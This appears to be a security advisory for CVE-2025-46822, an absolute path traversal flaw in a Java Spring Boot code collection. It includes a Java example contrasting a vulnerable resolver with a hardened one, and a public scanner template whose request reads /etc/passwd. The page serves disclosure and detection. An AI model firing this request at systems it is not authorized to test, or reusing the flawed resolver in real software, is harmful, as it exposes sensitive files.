CVE-2025-46822: Java-springboot-codebase 1.1 - Arbitrary File Read

Date: 2025-08-01 | Affected software: Java springboot codebase | PoC: public

Vulnerability description

OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
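The defect described above is absolute path traversal: a request path that is itself absolute bypasses a check that only looks for `..` segments, because `Path.resolve()` with an absolute argument discards the base directory. The following is an added Java example, not the project's code or its patch, showing that insufficient pattern beside a hardened resolver; the base directory, class and method names are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Optional;

// Hypothetical file-serving helper (example code, not the project's). Assumes files
// are served from a fixed base directory and the requested path comes from the URL.
public final class SafeFileResolver {

    // Insufficient pattern: only ".." is rejected. Path.resolve() with an absolute
    // argument returns that argument unchanged, so a request for "/etc/passwd"
    // leaves the base directory entirely. This is the absolute-path traversal class
    // of bug the advisory describes, reproduced here for illustration only.
    static Path resolveInsufficient(Path baseDir, String requested) {
        if (requested.contains("..")) {
            throw new IllegalArgumentException("traversal rejected");
        }
        return baseDir.resolve(requested);
    }

    // Hardened pattern: refuse absolute input, normalize, then confirm the result is
    // still inside the base directory. Returns empty rather than a path on rejection.
    static Optional<Path> resolveSafely(Path baseDir, String requested) {
        Path base = baseDir.toAbsolutePath().normalize();
        Path candidate = Paths.get(requested);
        if (candidate.isAbsolute()) {
            return Optional.empty();                 // absolute request: reject
        }
        Path resolved = base.resolve(candidate).normalize();
        if (!resolved.startsWith(base) || resolved.equals(base)) {
            return Optional.empty();                 // escaped via "..", or empty path
        }
        return Optional.of(resolved);
    }

    public static void main(String[] args) {
        Path base = Paths.get("/srv/app/files");     // assumed serving directory
        // Same request path as the PoC's second HTTP request, passed to both resolvers.
        System.out.println(resolveInsufficient(base, "/etc/passwd"));
        System.out.println(resolveSafely(base, "/etc/passwd"));
        System.out.println(resolveSafely(base, "../../etc/passwd"));
        System.out.println(resolveSafely(base, "reports/2025.pdf"));
    }
}
```

Symbolic links inside the base directory are not covered by the `startsWith` comparison; resolving with `toRealPath()` before comparing closes that gap.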

PoC code [public]

id: CVE-2025-46822

info:
  name: Java-springboot-codebase 1.1 - Arbitrary File Read
  author: haliteroglu25
  severity: high
  description: |
    OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
  reference:
    - https://github.com/OsamaTaher/Java-springboot-codebase
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46822
    - https://github.com/OsamaTaher/Java-springboot-codebase/security/advisories/GHSA-q6mm-cm37-w637
    - https://github.com/OsamaTaher/Java-springboot-codebase/commit/c835c6f7799eacada4c0fc77e0816f250af01ad2
    - https://github.com/PuddinCat/GithubRepoSpider
  classification:
    epss-score: 0.11483
    epss-percentile: 0.93309
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,java,springboot,codebase,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "Whitelabel Error Page","explicit mapping")'
        internal: true

  - raw:
      - |
        GET /api/v1/files/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c277e11533a66c27df6d39dea7865a0fceb46a55518959a5ebd7f54235a0e29f022100ee2b8f00a4172120e85179c0bf6c45a112afe1f9d08a921a971976f3a54ab3dd:922c64590222798bb761d5b6d8e72950